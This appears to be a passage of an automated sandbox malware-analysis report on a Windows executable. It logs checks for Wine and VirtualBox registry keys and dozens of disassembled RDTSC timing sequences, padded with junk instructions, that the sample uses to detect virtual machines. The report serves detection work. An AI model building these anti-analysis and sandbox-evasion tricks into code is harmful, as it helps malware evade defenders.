Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 87EA17 second address: 87EA27 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A00C74 second address: A00C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Ah 0x00000009 popad 0x0000000a jnl 00007F661CE75E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFD1F second address: 9FFD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFD23 second address: 9FFD2D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F661CE75E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFD2D second address: 9FFD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFE9B second address: 9FFED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jbe 00007F661CE75E86h 0x00000013 jmp 00007F661CE75E91h 0x00000018 jmp 00007F661CE75E91h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFED1 second address: 9FFEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F661D451436h 0x0000000a jnl 00007F661D451436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FFEE1 second address: 9FFEE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A00345 second address: A00349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02B68 second address: 87EA17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 1F2698EAh 0x0000000d push dword ptr [ebp+122D0781h] 0x00000013 movzx esi, cx 0x00000016 sbb di, F69Eh 0x0000001b call dword ptr [ebp+122D2E41h] 0x00000021 pushad 0x00000022 add dword ptr [ebp+122D29D2h], edi 0x00000028 xor eax, eax 0x0000002a cmc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f mov dword ptr [ebp+122D29D2h], edx 0x00000035 mov dword ptr [ebp+122D38BEh], eax 0x0000003b jmp 00007F661CE75E8Dh 0x00000040 mov esi, 0000003Ch 0x00000045 pushad 0x00000046 jmp 00007F661CE75E8Dh 0x0000004b mov dh, cl 0x0000004d popad 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 cld 0x00000053 clc 0x00000054 lodsw 0x00000056 mov dword ptr [ebp+122D2D4Fh], esi 0x0000005c cld 0x0000005d add eax, dword ptr [esp+24h] 0x00000061 mov dword ptr [ebp+122D29D2h], esi 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b xor dword ptr [ebp+122D2A26h], edx 0x00000071 nop 0x00000072 jp 00007F661CE75E94h 0x00000078 push eax 0x00000079 push edx 0x0000007a push edx 0x0000007b pop edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02BC2 second address: A02C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F661D451446h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F661D451438h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D232Bh], edi 0x00000031 push 00000000h 0x00000033 call 00007F661D451441h 0x00000038 jmp 00007F661D45143Dh 0x0000003d pop esi 0x0000003e call 00007F661D451441h 0x00000043 movzx edi, bx 0x00000046 pop edi 0x00000047 push 1C332BE6h 0x0000004c pushad 0x0000004d pushad 0x0000004e push edi 0x0000004f pop edi 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02C4E second address: A02CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F661CE75E8Ch 0x0000000b popad 0x0000000c xor dword ptr [esp], 1C332B66h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F661CE75E88h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d jmp 00007F661CE75E90h 0x00000032 push 00000003h 0x00000034 mov cx, 598Fh 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D2390h], ecx 0x00000040 push 00000003h 0x00000042 mov esi, dword ptr [ebp+122D2E0Bh] 0x00000048 mov dword ptr [ebp+122D2780h], edx 0x0000004e call 00007F661CE75E89h 0x00000053 pushad 0x00000054 push ebx 0x00000055 pushad 0x00000056 popad 0x00000057 pop ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02CC1 second address: A02CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02CC5 second address: A02CDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F661CE75E8Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02CDB second address: A02D01 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F661D45143Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F661D45143Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02D01 second address: A02D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02D11 second address: A02D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02D16 second address: A02D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F661CE75E96h 0x00000008 jns 00007F661CE75E86h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02DFF second address: A02E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02E1F second address: A02E56 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 jl 00007F661CE75E98h 0x0000000e jmp 00007F661CE75E92h 0x00000013 push 00000000h 0x00000015 mov esi, dword ptr [ebp+122D369Ah] 0x0000001b call 00007F661CE75E89h 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02E56 second address: A02E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02E5B second address: A02E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F661CE75E90h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E95h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0308B second address: A030A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A030A0 second address: A03138 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7E1C1DC5h 0x0000000f pushad 0x00000010 mov dh, E5h 0x00000012 xor ecx, dword ptr [ebp+122D37DEh] 0x00000018 popad 0x00000019 push 00000003h 0x0000001b call 00007F661CE75E96h 0x00000020 pop ecx 0x00000021 push 00000000h 0x00000023 jl 00007F661CE75E8Ch 0x00000029 add edi, 32FE15BAh 0x0000002f push 00000003h 0x00000031 sub si, E6F8h 0x00000036 push B4596807h 0x0000003b jmp 00007F661CE75E8Fh 0x00000040 xor dword ptr [esp], 74596807h 0x00000047 mov dword ptr [ebp+122D2DB8h], edi 0x0000004d add dword ptr [ebp+122D2337h], edx 0x00000053 lea ebx, dword ptr [ebp+12457AC4h] 0x00000059 push esi 0x0000005a jnc 00007F661CE75E88h 0x00000060 pop esi 0x00000061 mov si, B8BCh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F661CE75E92h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13DE3 second address: A13DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13DE9 second address: A13DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13DF2 second address: A13DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23CF5 second address: A23CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23CF9 second address: A23D1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F661D451436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007F661D451436h 0x00000020 jnl 00007F661D451436h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23D1F second address: A23D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F0F4C second address: 9F0F5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21BF2 second address: A21BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F661CE75E86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21BFF second address: A21C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21C08 second address: A21C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E99h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21EBD second address: A21EEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F661D451443h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F661D451440h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A21EEA second address: A21EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22147 second address: A2214B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2214B second address: A22162 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jp 00007F661CE75E88h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22300 second address: A22304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2248F second address: A224AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A224AE second address: A224D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jns 00007F661D451436h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F661D45143Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A224D1 second address: A224D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22CC9 second address: A22CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F661D45143Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F661D451438h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F661D451445h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19F1F second address: A19F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jl 00007F661CE75E86h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19F30 second address: A19F3D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F661D451436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22E5A second address: A22E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jmp 00007F661CE75E93h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22E77 second address: A22E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Ah 0x00000009 pop esi 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F661D451436h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A22E90 second address: A22EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F661CE75E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23608 second address: A23624 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F661D451444h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23624 second address: A23628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A237A2 second address: A237B2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F661D451436h 0x00000008 je 00007F661D451436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A237B2 second address: A237B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23B8D second address: A23B91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23B91 second address: A23BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F661CE75E86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BA0 second address: A23BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F661D45143Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BB2 second address: A23BB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BB7 second address: A23BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F661D451436h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A23BC5 second address: A23BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F661CE75E86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262A1 second address: A262A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262A7 second address: A262C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F661CE75E92h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262C6 second address: A262CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A262CC second address: A26312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jmp 00007F661CE75E99h 0x00000015 pop ecx 0x00000016 mov eax, dword ptr [eax] 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F661CE75E86h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A24BE6 second address: A24BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A253CF second address: A253D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2C3EE second address: A2C3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F592 second address: A2F5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E94h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F5AC second address: A2F5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F661D451443h 0x0000000b jmp 00007F661D45143Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F5C4 second address: A2F5CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F861 second address: A2F86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F661D451436h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F86F second address: A2F875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2F875 second address: A2F8B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 je 00007F661D45144Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F661D451446h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FDCD second address: A2FDEA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F661CE75E92h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FF70 second address: A2FF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2FF74 second address: A2FF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F661CE75E86h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 jmp 00007F661CE75E8Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32B33 second address: A32B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 add dword ptr [esp], 5AB4AA60h 0x0000000c jmp 00007F661D45143Dh 0x00000011 push C5E9A9CAh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A32FD1 second address: A32FEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A337AC second address: A337B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A7A second address: A33A84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A33A84 second address: A33A91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
